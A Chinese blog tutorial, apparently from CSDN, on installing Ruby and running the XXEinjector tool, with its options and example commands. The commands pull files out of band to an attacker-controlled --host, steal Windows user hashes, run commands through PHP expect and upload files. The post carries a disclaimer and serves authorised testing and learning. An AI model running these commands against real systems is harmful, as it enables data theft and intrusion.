XXE工具——XXEinjection安装与使用

最新推荐文章于 2024-05-29 09:37:22 发布
最新推荐文章于 2024-05-29 09:37:22 发布
阅读量1.4k 收藏 8
点赞数 5
分类专栏: 渗透测试 文章标签: XXE漏洞 XXEinjection Ruby 渗透测试 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/128416035
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE工具——XXEinjection安装与使用。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、XXEinjection工具介绍

XXEinjection是一个XXE漏洞利用工具,XXEinjection可以使用直接和带外方法(这里的带外方法指的是当XXE漏洞无回显时,使用特定方法让Web请求其他的URL,并将文件数据放在URL中,以此获得文件数据)获取文件信息。其中列举目录的功能仅适用于JAVA Web,暴力破解的方法适用于其他的应用。

二、Ruby环境安装

由于该XXEinjection是基于Ruby环境安装的,因此我们要运行该工具,就必须先安装Ruby环境。在Windows环境下,Ruby环境可以直接前往站点:
https://rubyinstaller.org/downloads/下载,该网页如下所示:
在这里插入图片描述
我们直接下载rubyinstaller,这个安装包会自动安装ruby,安装过程如下所示:
在这里插入图片描述
ruby环境安装完成后,我们可以在本地cmd环境下执行命令:

ruby -v

结果如下所示:
在这里插入图片描述
从上图可以看出,当前我们的ruby环境已经安装成功!

三、XXEinjection常用参数说明

XXEinjection工具常用参数如下所示:
–host 必选项,用于建立反向链接的IP地址(通常本机IP,测试公网站点必须保证为公网IP)
–file 必选项,包含有效HTTP请求的数据包文件。
–path 当用于枚举路径时的必选项,指定要枚举的目录
–brute 当需要爆破文件时的必选项,指定要爆破的文件路径
–logger 用于记录输出结果
–rhost 远程主机域名或者IP地址
–rport 指定远程主机的端口号
–phpfiler 使用此参数,表示使用PHP对目标文件进行base64编码
–netdoc 表示使用netdoc协议,java使用
–enumports 枚举用于反向链接的未过滤端口
–hashes 窃取运行当前Web程序的用户hash(针对Windows操作系统)
–expect 使用PHP的expect模块执行系统命令
–upload 使用JAVA jar向临时目录上传文件
–xslt 进行xslt注入测试
–ssl 表示使用https
–proxy 表示使用代理
–httpport 表示自定义http端口
–ftpport 表示自定义ftp端口
–gopherport 表示自定义gopher端口
–jarport 表示自定义文件上传端口
–xsltport 表示自定义进行XSLT注入测试的端口
–test 表示用于测试请求的有效性
–urlencode 表示进行URL编码
–output 表示指定一个文件作为日志,将爆破攻击结果输入该日志中
–timeout 表示设置接收文件或者目录的超时时间
–verbose 表示显示详细信息
–fast 表示跳过枚举查询,这样可以加快速度,但是有可能导致结果有误
–contimeout 表示设置与目标服务器的链接超时时间

四、XXEinjection使用示例

对该工具的利用,应该首先抓到指定目标访问的数据包,然后在可以写入XML文档的地方输入XXEINJECT,如下所示:
在这里插入图片描述
将上述数据包存储成本地txt文档后,就可以让该文档作为–file参数的值了。
XXEinjection使用示例如下所示:
1、ruby XXEinjection.rb --host=192.168.136.101 --path=/etc --file=./test.txt --ssl
表示枚举https应用中的/etc目录
2、ruby XXEinjection.rb --host=192.168.136.101 --file=./test.txt --oob=gopher
使用gopher(oob方法)枚举/etc目录
3、ruby XXEinjection.rb --host=192.168.136.101 --file=./text.txt -oob=http --netdoc
使用HTTP带外方法和netdoc协议进行攻击
4、ruby XXEinjection.rb --host=192.168.136.101 --file=./test.txt --enumports=all
枚举所有端口
5、ruby XXEinjection.rb --host=192.168.136.101 --file=./test.txt --hashes
窃取windows操作系统Web运行用户hash值
6、ruby XXEinjection.rb --host=192.168.136.101 --file=./test.txt --upload=./UploadFile
使用JAVA jar上传文件
7、ruby XXEinjection.rb --host=192.168.136.101 --file=./test.txt --oob=http --phpfilter --expect=id
调用expect模块,执行系统id命令
8、ruby XXEinjection.rb --host=192.168.136.101 --file=./test.txt --xslt
测试XSLT注入
9、ruby XXEinjection.rb --logger --oob=http --output=./output.txt
将请求信息写入到output.txt文件中。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
7.XXEinjector:一款功能强大的自动化XXE注射工具
weixin_30492047的博客
09-09 541
今天给大家介绍的是一款名叫XXEinjector的漏洞利用工具XXEinjector是一款基于RubyXXE注入工具, 它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解 攻击需要使用到其他应用程序。 XXEinjector注入工具使用 XXEinjector本身提供了非常非常丰富的操作选项,所以大家在利用XXEinjector进行渗透...
xxexploiter:帮助利用XXE漏洞工具
02-06
安装 #install node and npm if you don't have it yet npm install -g xxexploiter 从源代码构建和运行 这是一个用打字稿编写的简单Node应用程序。 因此,您可以在构建其他应用程序时进行构建: (如果没有,请先...
Xxe外部实体注入(XML External Entity Injection
xuyunpeng3189的博客
01-23 1067
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体的注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
XXEinjector.zip
08-24
XXEinjector 一款XXE注入测试工具,可以通过命令行快速检测可能存在的XXE漏洞
探索与利用:XXE漏洞利用工具——XXEclient
最新发布
gitblog_00099的博客
05-29 271
探索与利用:XXE漏洞利用工具——XXEclient 项目地址:https://gitcode.com/AonCyberLabs/xxe-recursive-download 在这个数字时代,网络安全的重要性不言而喻。今天,我们要向你介绍一个强大的开源项目——XXEclient,它是一个专门用于通过XML外部实体(XXE漏洞获取目标服务器文件的工具。无论你是安全研究人员,还是希望增强自己在Web...
XXEinjector
weixin_33699914的博客
12-23 345
https://github.com/enjoiz/XXEinjector 转载于:https://blog.51cto.com/duallay/2053838
XXEInjection用法
weixin_34241036的博客
11-11 401
2019独角兽企业重金招聘Python工程师标准>>> ...
基于XXE漏洞的网络安全分析与利用工具开发
05-07
当应用是通过用户上传的XML文件或POST请求进行数唱的传输,并日应用没有禁止XNML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞XXE漏洞发生在应用程序解析XML输入时,...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
信息安全_xxe注入应用与拓展.pptx
08-14
什么是XXE 什么地方可能存在XXE Zend框架 Xml-rpc模块的xxe Springmvc里的xxe slim框架里的xxe 解析docx文件 XXE能干嘛 XXE怎么去读文件 XXE注入外带数据回显 XXE怎么去修复
vulnd_xxe:易受XXE攻击的服务器,可用于使用xxer工具测试有效负载
02-06
vulnd_xxe 易受XXE影响的服务器,可以使用或与此相关的任何其他工具来测试有效负载。 它是用Java编写的,因为所有Java服务器都容易受到XXE的攻击,我喜欢痛苦(两点都可能有点夸张)。 实际上,我在编写时需要测试东西,并认为这样的东西对我和其他人都是有用的。 目标观众 想要了解XXE注射剂及其影响的渗透测试人员和开发人员。 那些想以最令人费解和痛苦的方式浏览互联网和自己的文件系统的人。 屏幕截图 仪表板 例 跑步 要求 JDK 1.8以上 Maven 建造 mvn compile 跑步 mvn exec:java 将浏览器指向 。
XXE Injection笔记
Bendawang's Blog
07-05 3868
XXE Injection笔记
XXEinjector全过程安装详细和使用教程
星语惜馨的博客
07-14 4482
xml的xxe漏洞是目前Java比较关注的,使用多种直接或间接带外方法来检索文件,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。由于网上都是只有使用教程或者介绍功能(可能像我这样需要傻瓜式的有点少),我就收集整理详细一点。 搭建的系统:ubuntukylin-16.04-desktop-amd64(比较习惯有gui的) xxeinjector工具:https...
Kali 安装 Ruby环境 和 XXE神器XXEinjector 教程
Jay17的博客
08-05 496
Kali 安装 Ruby环境 和 XXE神器XXEinjector 教程
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6352
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 595
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
pikachu XXE
08-31
pikachu是一个开源的漏洞扫描工具XXE(XML External Entity)漏洞是其中一个模块。 XXE漏洞是指攻击者通过构造恶意的XML实体来访问本地或远程文件系统,从而获取敏感信息或执行任意代码。这样的漏洞通常出现在使用XML解析器的应用程序中,当应用程序没有正确配置解析器时,攻击者可以利用XXE漏洞来进行攻击。 在pikachu中,XXE模块可以帮助用户扫描和发现应用程序中的XXE漏洞,并提供修复建议。使用pikachu进行XXE扫描的过程包括将pikachu文件夹放到web服务器根目录下,修改配置文件中的数据库连接配置,然后访问相应的URL进行安装和初始化。 总结来说,pikachu是一个漏洞扫描工具,其中包含XXE漏洞模块,可以帮助用户发现和修复应用程序中的XXE漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Pikachu系列——XXE](https://blog.csdn.net/Zlirving_/article/details/106274289)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [pikachu之xxe](https://blog.csdn.net/qq_43665434/article/details/113867722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值